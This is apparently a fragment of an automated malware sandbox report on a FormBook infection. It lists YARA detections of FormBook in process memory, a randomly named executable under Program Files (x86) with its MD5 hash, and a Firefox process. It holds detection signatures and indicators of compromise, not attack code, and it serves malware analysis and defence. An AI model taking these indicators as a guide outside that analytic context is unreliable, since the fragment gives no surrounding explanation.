                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:7
                                                Start time:21:40:46
                                                Start date:16/12/2024
                                                Path:C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe"
                                                Imagebase:0xf90000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:9
                                                Start time:21:40:58
                                                Start date:16/12/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff79f9e0000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                No disassembly